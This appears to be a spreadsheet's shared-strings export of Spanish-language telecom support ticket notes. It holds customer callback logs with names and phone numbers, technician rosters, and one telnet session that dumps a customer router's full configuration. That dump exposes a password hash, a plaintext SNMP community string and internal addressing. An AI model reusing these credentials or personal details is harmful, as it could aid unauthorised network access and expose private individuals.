  <si>
    <t>F4587200</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK ARAGON AL 85888101 NO RESPONDE, ENVIA A BUZON ||
SE INTENTARA LUEGO**
-ID 1001032391
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK ARAGON AL 85888101 NO RESPONDE, ENVIA A BUZON ||
SE INTENTARA LUEGO**
-ID 1001021305
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK ARAGON 85888101 ENVIA DIRECTAMENTE A BUZON, NO SE TIENE OTRO CONTACTO
-ID 3001968640</t>
  </si>
  <si>
    <t>F4587201</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN SOLORZANO 86857653 ENVIA DIRECTAMENTE A BUZON ||
SE INTENTARA LUEGO**
-ID 3001832345
**</t>
  </si>
  <si>
    <t>F4587226</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. ALVARO PEREZ 77526480 NO SE LOGRO COMUNICACION IVR ENVIA A BUZON, ID: 3001906998.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO CON EVIDENCIA DE LA SATURACION:
ASUNTO: EVIDENCIA DE SATURACIÓN IDG000182 || ALIMENTOS Y TURISMO S.A. DE C.V.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ALVARO PEREZ 77526480 NO CONTESTA IVR ENVIA A BUZON, ID: 3001927714.</t>
  </si>
  <si>
    <t>F4587247</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER  AROCHE 24139000 EXT 87270 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001868866</t>
  </si>
  <si>
    <t>F4587260</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RODOLFO URIZAR AL 46240171 CONFIRMA SERVICIO ESTABLE Y OPERATIVO INDICA QUE ERA TEMA DE ENERGIA **
ID 3001912045
**</t>
  </si>
  <si>
    <t>F4587273</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 23095489  MENCIONA QUE EL PROBLEMA ES INTERNO, LE ESTARAN DANDO SEGUIMIENTO CON SU IT
SE LE INDICA QUE A NIVEL DE CLARO EL SERVICIO ESTA OPERATIVO Y ESTABLE
-ID 3001826213</t>
  </si>
  <si>
    <t>F4587275</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSWALDO PACHECO-63024937   INDICA QUE  YA TIENE LLAMADAS ##SE PROCEDE AL CIERRE ##VIVO
3001814170
COLA:
NOMBRE: A: 0050363024937
NÚMERO: 0050363024937
DURACIÓN: 0:00:41
ESTADO: CONECTADA
DETALLES: 0050363024937
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 2/06/2022 09:46:04</t>
  </si>
  <si>
    <t>F4587282</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO AL 87396320  SE BRINDA RETROALIMENTACION **
ID 3001871467
**</t>
  </si>
  <si>
    <t>F4587285</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS BEDOYA 54118529 MENCIONA QUE REALIZARA PRUEBAS, SOLICITA LLAMADA EN 5 MIN
-ID 3001846225</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS BEDOYA 54118529 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001851982</t>
  </si>
  <si>
    <t>F4587314</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO CASTRO 42271739 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 3001819981</t>
  </si>
  <si>
    <t>F4587317</t>
  </si>
  <si>
    <t>172.18.37.254 &gt;&gt;&gt; CLIENTE INDICA QUE SI TIENE EL HUAWEI PROCEDIO A CONECTARLO A TOMACORRIENTE (APLICA REINICIO) INDICA QUE NO PUEDE RECOLOCAR LA SIM YA QUE CUENTA EL SLOT ATORNILLADOS.--- SE CONTINUAN CON PRUEBAS----</t>
  </si>
  <si>
    <t>F4587318</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUSTO OROZCO 51259264 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID3001829226</t>
  </si>
  <si>
    <t>F4587319</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARVIN LOPEZ 52145131 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO  ROSARIO - 43221537
-ID 3001830636</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROSARIO - 43221537 MNCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 3001832076</t>
  </si>
  <si>
    <t>F4587320</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AXEL RECINOS 40138806 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001847635 - 3001848443</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AXEL RECINOS 40138806 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 3001834253</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE 40138806 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001872453</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AXEL RECINOS 40138806 MENCIONA QUE SE MOVILIZO A PR Y NO HAY NADIE POR LO QUE LOS EQUIPOS SE ENCUENTRAN APAGADOS
-ID 3001942896</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AXEL RECINOS 40138806 SIGUE SIN RESPONDER, SE INTENTARA LUEGO
-ID 3001882301</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AXEL RECINOS 40138806 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001861492</t>
  </si>
  <si>
    <t>F4587322</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SCARLET MANZANERO 41753805 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 3001843763</t>
  </si>
  <si>
    <t>SE LLAM A CLIENTE SCARLET MANZANERO 41753805 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 3001837110</t>
  </si>
  <si>
    <t>F4587323</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX HERNANDEZ-75411228 ##3 VECES ##ENVIA A BUZON ## FAVOR RESOLVER WO- SE INTANTA LOCALIZAR A CLIENTE ##
3001857743
COLA:
NOMBRE: A: 0050375411228
NÚMERO: 0050375411228
DURACIÓN: 0:00:45
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050375411228
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 2/06/2022 11:38:32
3001857519
COLA:
NOMBRE: A: 0050375411228
NÚMERO: 0050375411228
DURACIÓN: 0:00:37
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050375411228
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 2/06/2022 11:37:56
3001858434
COLA:
NOMBRE: A: 0050375411228
NÚMERO: 0050375411228
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050375411228
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 2/06/2022 11:38:38</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX HERNANDEZ-75411228 NO CONTESTA ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX HERNANDEZ-75411228 ENVIA A BUZON 2 VECES ##SE INTENTARA LUEGO
3001875162
COLA:
NOMBRE: A: 0050375411228
NÚMERO: 0050375411228
DURACIÓN: 0:00:26
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050375411228
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 2/06/2022 12:22:58
3001875323
COLA:
NOMBRE: A: 0050375411228
NÚMERO: 0050375411228
DURACIÓN: 0:00:22
ESTADO: MARCANDO
DETALLES: 0050375411228
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 2/06/2022 12:23:19</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEX HERNANDEZ-75411228 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001873813
**</t>
  </si>
  <si>
    <t>CLIENTE VALIDA##SE PROCEDE AL CIERRE## 3001875956</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  AL GDN   22252789   --ALEX HERNANDEZ-75411228 SE TIENE EN LINEA ##
3001875956
COLA:
NOMBRE: A: 0050322252789
NÚMERO: 0050322252789
DURACIÓN: 0:03:29
ESTADO: CONECTADA
DETALLES: 0050322252789
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 2/06/2022 12:27:34</t>
  </si>
  <si>
    <t>F4587325</t>
  </si>
  <si>
    <t>CCR HONDURAS				
	WO OPEN                                			11:30
1/4	LUIS SANDRES           	89904245	2.5 HORAS	14:00:00
2/4	FRANKLIN BUESO  	89904208	3 HORAS	14:30:00
3/4	MANUEL LARIOS   	31921638	5 HORAS	16:30:00
4/4	PASTOR RAMIREZ  	33910016	6 HORAS	17:30:00</t>
  </si>
  <si>
    <t>&lt;CSPSHNPPN1D1EIM3&gt;PING -VPN RCT 10.2.128.42
  PING 10.2.128.42: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.2.128.42: BYTES=56 SEQUENCE=1 TTL=255 TIME=3 MS
    REPLY FROM 10.2.128.42: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.2.128.42: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.2.128.42: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.2.128.42: BYTES=56 SEQUENCE=5 TTL=255 TIME=2 MS
  --- 10.2.128.42 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/3 MS
&lt;CSPSHNPPN1D1EIM3&gt;TELNET VPN RCT 10.2.128.42
TRYING 10.2.128.42 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.2.128.42 ...
USER ACCESS VERIFICATION
USERNAME: CLARO
PASSWORD:
1413519_CSC867_AA_SEVENDR_SAN34#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GIGABITETHERNET0           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET1           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET2           UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET2.2140      10.82.92.67     YES NVRAM  UP                    UP
GIGABITETHERNET2.3506      10.2.128.42     YES NVRAM  UP                    UP
VLAN1                      172.29.37.185   YES NVRAM  UP                    UP
1413519_CSC867_AA_SEVENDR_SAN34#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.2.128.41             0   0000.5E00.0105  ARPA   GIGABITETHERNET2.3506
INTERNET  10.2.128.42             -   0045.1DBB.03C5  ARPA   GIGABITETHERNET2.3506
INTERNET  10.2.128.45            15   F479.6055.4108  ARPA   GIGABITETHERNET2.3506
INTERNET  10.2.128.46            16   084F.0AC8.6590  ARPA   GIGABITETHERNET2.3506
INTERNET  10.82.92.65             0   0000.5E00.0106  ARPA   GIGABITETHERNET2.2140
INTERNET  10.82.92.67             -   0045.1DBB.03C5  ARPA   GIGABITETHERNET2.2140
INTERNET  10.82.92.86            31   501C.BFDE.BB05  ARPA   GIGABITETHERNET2.2140
INTERNET  10.82.92.125            0   F479.6055.4108  ARPA   GIGABITETHERNET2.2140
INTERNET  10.82.92.126           15   084F.0AC8.6590  ARPA   GIGABITETHERNET2.2140
INTERNET  172.29.37.185           -   0045.1DBB.03C0  ARPA   VLAN1
INTERNET  172.29.37.186           0   B083.FE6D.DE11  ARPA   VLAN1
1413519_CSC867_AA_SEVENDR_SAN34#SHO INTE
1413519_CSC867_AA_SEVENDR_SAN34#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1000         1     19000         1         0
  FASTETHERNET2                 0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET1              0         0         0         0         0         0         0         0         0
* GIGABITETHERNET2              0         0         0         0     22000         6      2000         3         0
* GIGABITETHERNET2.2140         -         -         -         -         -         -         -         -         -
* GIGABITETHERNET2.3506         -         -         -         -         -         -         -         -         -
* VLAN1                         0         0         0     10241      1000         1     20000         1         0
NOTE:NO SEPARATE COUNTERS ARE MAINTAINED FOR SUBINTERFACES
     HENCE DETAILS OF SUBINTERFACE ARE NOT SHOWN
1413519_CSC867_AA_SEVENDR_SAN34#SHO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1413519_CSC867_AA_SEVENDR_SAN34 UPTIME IS 20 HOURS, 41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103CB
1 DSL CONTROLLER
1 ETHERNET INTERFACE
3 FASTETHERNET INTERFACES
4 GIGABIT ETHERNET INTERFACES
1 ATM INTERFACE
1 TERMINAL LINE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
8192K BYTES SYSTEM FLASH ALLOCATED
CONFIGURATION REGISTER IS 0X2102
1413519_CSC867_AA_SEVENDR_SAN34#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4060 BYTES
!
VERSION 15.6
NO SERVICE PAD
SERVICE TCP-KEEPALIVES-IN
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME 1413519_CSC867_AA_SEVENDR_SAN34
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
LOGGING BUFFERED 51200 WARNINGS
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
!
!
!
!
!
!
NO IP DOMAIN LOOKUP
IP DOMAIN NAME YOURDOMAIN.COM
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-1300322982
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-1300322982
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-1300322982
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-1300322982
 CERTIFICATE SELF-SIGNED 01
  3082022B 30820194 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 31333030 33323239 3832301E 170D3139 31303138 31363131
  31395A17 0D323030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D31 33303033
  32323938 3230819F 300D0609 2A864886 F70D0101 01050003 818D0030 81890281
  8100F9A3 3CD5E240 6EA31516 9B72C852 7612C304 F764624E 660206A1 9A6FD050
  59EE7CD6 F2472472 2DB458D6 922EF563 8D0F4C17 42311CB9 12F32701 9187A6A3
  99DBA976 69892C77 73A0C9CD 30253BD8 17BCB889 7240F17D 67A949EC F75329A9
  2348BF14 59AA7607 D6C2A9C6 9FA613B3 5E90DD8D E8F2740E B678B69B F2E85A13
  3F1D0203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF 301F0603
  551D2304 18301680 14EB747D 752605E8 D5CD218D EB91EDF5 02A6B474 19301D06
  03551D0E 04160414 EB747D75 2605E8D5 CD218DEB 91EDF502 A6B47419 300D0609
  2A864886 F70D0101 05050003 8181002D 60248E63 EEBF3A3B 3A19843F 58E608A9
  04ECC169 383F8AD2 B188D1C2 7956257A 14303ADC 24DDE8E4 4345652F E743DB3C
  95EE6AA2 5DABD3CD 3E009FDD 091764A5 4EF0EB23 7AEB5ABF 9BBECC6E FF1DC70A
  D05A9D2C 2063254E 961B759F 0AE8F8D3 97F39615 68ED0B15 CA231169 54B08D06
  A964868E 39552ECB 6E7A50B5 05F846
        QUIT
!
!
USERNAME CLARO PRIVILEGE 15 SECRET 5 $1$662S$IGG4XJP3NVXVY2ITKSZQG.
!
!
CONTROLLER VDSL 0
 SHUTDOWN
NO CDP RUN
!
!
!
!
!
!
!
!
!
!
!
!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NO IP ADDRESS
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET2.2140
 DESCRIPTION GESTION
 ENCAPSULATION DOT1Q 2140
 IP ADDRESS 10.82.92.67 255.255.255.192
 NO CDP ENABLE
!
INTERFACE GIGABITETHERNET2.3506
 DESCRIPTION /_/1413519/_/DT5M_AA_SEVENDER_SAN34
 ENCAPSULATION DOT1Q 3506
 IP ADDRESS 10.2.128.42 255.255.255.248
 NO CDP ENABLE
!
INTERFACE VLAN1
 DESCRIPTION LAN
 IP ADDRESS 172.29.37.185 255.255.255.248
 RATE-LIMIT INPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP TCP ADJUST-MSS 1452
!
NO IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP ROUTE 0.0.0.0 0.0.0.0 10.2.128.41 NAME DEFAULT_ROUTE
IP ROUTE 10.31.210.16 255.255.255.248 10.82.92.65 NAME SS_GT
IP ROUTE 10.33.2.0 255.255.255.0 10.82.92.65 NAME GESTION_SOLAR
IP ROUTE 10.195.1.0 255.255.255.0 10.82.92.65 NAME VPNHN
IP ROUTE 10.195.4.79 255.255.255.255 10.82.92.65 NAME GESTION_TGU
IP ROUTE 10.195.14.47 255.255.255.255 10.82.92.65 NAME GESTION_SPS
IP SSH SERVER ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
IP SSH CLIENT ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
!
!
SNMP-SERVER COMMUNITY G3$T10NH0DUR@$ RO
!
!
LINE CON 0
 LOGIN LOCAL
 NO MODEM ENABLE
LINE AUX 0
 LOGIN LOCAL
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT INPUT ALL
 STOPBITS 1
LINE VTY 0 4
 ACCESS-CLASS ACCESOREMOTO IN
 PRIVILEGE LEVEL 15
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 60000 1000
!
END
1413519_CSC867_AA_SEVENDR_SAN34#</t>
  </si>
  <si>
    <t>F4587355</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE NORMA PATRICIA 84384975 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001879519</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUADALUPE CARMONA/  85745259 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001016324</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GUADALUPE CARMONA/  85745259 NO RESPONDE, ENVIA A BUZON ||
SE INTENTARA LUEGO**
-ID 1001110989
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GUADALUPE CARMONA/  85745259 NO RESPONDE, ENVIA A BUZON ||
SE INTENTARA LUEGO**
-ID 1001091310
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GUADALUPE CARMONA/  85745259 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 8:00
-ID 3001892343</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  NORMA PATRICIA 84384975 NO RESPONDE, SE INTENTAR ALUEGO
-ID 3001891656</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 88332032 / FRANCISCO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001880386</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUADALUPE CARMONA/  85745259 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001879917</t>
  </si>
  <si>
    <t>F4587359</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUILLERMO AGUIRRE 79088588 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001881435</t>
  </si>
  <si>
    <t>F4587368</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN MOLINA AL 59780700 NO RESPONDE SE INTENTARA LUEGO **
ID 3001857125
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDREA CASTILLO AL 58928518 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 3001857596
**</t>
  </si>
  <si>
    <t>F4587369</t>
  </si>
  <si>
    <t>** SE LLAMA A CLIENTE ADA TUPUL AL 56154393 INDICA QUE AUN ESTA CAIDO EL SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001865900
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO MONASTERIO AL 31202921 INDICA QUE NO SE ENCUENTRA EN LA AGENCIA SOLICITA QUE SE LLAME A ADA TUPUL AL 56154393 **
ID 3001865070
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO LUTIN 59309918 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001938891</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO LUTIN 59309918 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO**
-ID 3001943769
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. FRANCISCO LUTIN 59309918 INFORMA QUE NO TIENEN ACCESO AL DASHBOAR MERAKI PARA VALIDAR, ESTARA VALIDANDO CON PUNTO REMOTO DESPUES DE LAS 3PM, SE VALIDARA DESPUES DE LAS 3PM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. FRANCISCO LUTIN  AL 59309918  NO CONTESTA || SE INTEN TARA LUEGO **
ID 3001933773
**</t>
  </si>
  <si>
    <t>F4587372</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DEL CLIENTE OSCAR ESTRADA 47190166 INDICA QUE SUS CLIENTES LE HAN REPORTADO QUE LA LLAMAR AL GDN LA LLAMADA NO COMPLETA, PERO COMENTA QUE A REALIZADO VARIAS PRUEBAS Y TODAS LAS LLAMADAS HAN COMPLETADO CORRECTAMENTE, SOLICITA QUE SE LE CONTACTE A LAS 16:00 HORAS
3001845536
COLA:
NOMBRE: A: 47190166
NÚMERO: 47190166
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DURACIÓN: 0:00:58
DETALLES: 47190166
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 2/06/2022 11:06:48</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OSCAR ESTRADA  AL 47190166   CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001946094
**</t>
  </si>
  <si>
    <t>F4587388</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO 32744404  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001017984</t>
  </si>
  <si>
    <t>F4587399</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERVIN DE LEON 58500516 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMETNE
-ID 3001835474</t>
  </si>
  <si>
    <t>F4587419</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE 83506746  JULIO GUTIERREZ PARA SEGUIMIENTO DEL CASO SIN EMBARGO NO RESPONDE--ENVIA A BUZON</t>
  </si>
  <si>
    <t>PLANTA INTERNA - CNOC NICARAGUA 				
	WO OPEN                                			1:00:00 P. M.
1/4	NACXHITL BERNARDINO PEREIRA 	87134513	3 HORAS	16:00:00
2/4	MARLON JAIME	88500414	4 HORAS	17:00:00
3/4	NORMAN SELVA                	88561050	5 HORAS	18:00:00
4/4	MARIO HURTADO	88538938	6 HORAS	19:00:00</t>
  </si>
  <si>
    <t>F4587436</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 14:44
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; ADMIN2@JUNGLA.COM &lt;ADMIN2@JUNGLA.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
ASUNTO: RE: PRUEBAS DEL SERVICIO JUEGOS RECREATIVOS JUNGLA, S.A. || 741400001 || SD1131215
*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JASON AL 40100212 INDICA QUE YA CUENTA CON LA LAPTO PARA REALIZAR LAS PRUEBAS || SE NOTIFICA A GESTOR **
-ID 1001016373
**</t>
  </si>
  <si>
    <t>SE VALIDARON PRUEBAS CON CLIENTE, NO SE LLEGA AL ANCHO DE BANDA CONTRADO LUEGO DE CONECTAR DIRECTAMENTE AL CPE CON UNA LAPTOP, AL MOMENTO DE ELIMINAR LIMITANTE DEL CPE, CLIENTE INDICA QUE LE DA UNA VELOCIDAD ENTRE 7 Y 9 MPBS, POR LO QUE SE COORDINARA VISITA PARA CERTIFICAR EL ANCHO DE BANDA, CLIENTE SOLICITA QUE PARA PODER TRABAJAR MIENTRAS LLEGAN LOS TECNICOS, SE LE DEJA ABIERTA LA LIMITANTE, Y SE PROCEDE CONFORME LA SOLICITUD, SE DEJARA SIN LIMITANTE EN CPE MIENTRAS LOS TECNICOS LLEGAN AL SITIO A CERTIFICAR ANCHO DE BANDA.
1001078200
COLA: CNOC_SEGUIMIENTO
NOMBRE: A: 40100212
NÚMERO: 40100212
DURACIÓN: 0:09:36
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 40100212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 3/06/2022 11:45:31</t>
  </si>
  <si>
    <t>F4587484</t>
  </si>
  <si>
    <t>CLIENTE NO NOS CONTESTA PARA REALIZAR PRUEBAS, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILBER CONSTANTE 77449901 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA LAS 13:30 HRS
-ID 1001039912</t>
  </si>
  <si>
    <t>CLIENTE CARMEN ESTA INTENTANDO CONTACTAR A WILBER PERO NO CONTESTA, COMENTA QUE NOS COMUNIQUEMOS CON MARCO EN SITIO
CLIENTE INDICA QUE TIENE UN ASMI 52 EL CUAL TIENE LAS SIGUIENTES ALARMAS
PWR - VERDE
SYNC - ROJO
ALM - ROJO
CLIENTE APLICA REINICIO DEL EQUIPO, NOS MANTIENE EN LINEA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE WILBER CONSTANTE 77449901 PARA REALIZAR PRUEBAS CON LOS EQUIPOS, NOS ATIENDE CARMEN
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NOS MANTIENE EN LINEA MIENTRAS TERMINA OTRA LLAMADA
##LAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>NOS ATIENDE UNA SRITA QUIEN INIDCA QUE WILBER ESTA EN SU HORA DE ALMUERZO, SOLICITA QUE SE LE CONTACTE EN 40 MIN PARA VALIDAR SI YA REGRESO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE REINICIA EQUIPO, PERO EL SERVICIO NO RESTABLECE, SE LE INDICA QUE SE ENVIARA PERSONAL TECNICO A REALIZAR PRUEBAS CON LOS EQUIPOS Y VALIDAR QUE NO HAYA PROBLEMAS, CLIENTE INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS UNICAMENTE QUE LLEGUEN ANTES DE LAS 16:00 HRS EN DADO CASO SE TARDEN MAS INDICA QUE SE COORDINE A LAS 8:00 AM EL DIA DE MAÑANA 3, SE CONFIRMA DIRECCION
SE PROCEDE A COORDINAR
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4587490</t>
  </si>
  <si>
    <t>JUAN PABLO MORALES BARRONDO
JUE 02/06/2022 11:39 A.M.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PODRÍAN CONFIRMARNOS SI SE TIENE ALGÚN INCONVENIENTE CON LA ENERGÍA O BIEN BRINDARNOS LOS CONTACTOS DEL PUNTO REMOTO PARA REALIZAR PRUEBAS.
TICKET: F4587490
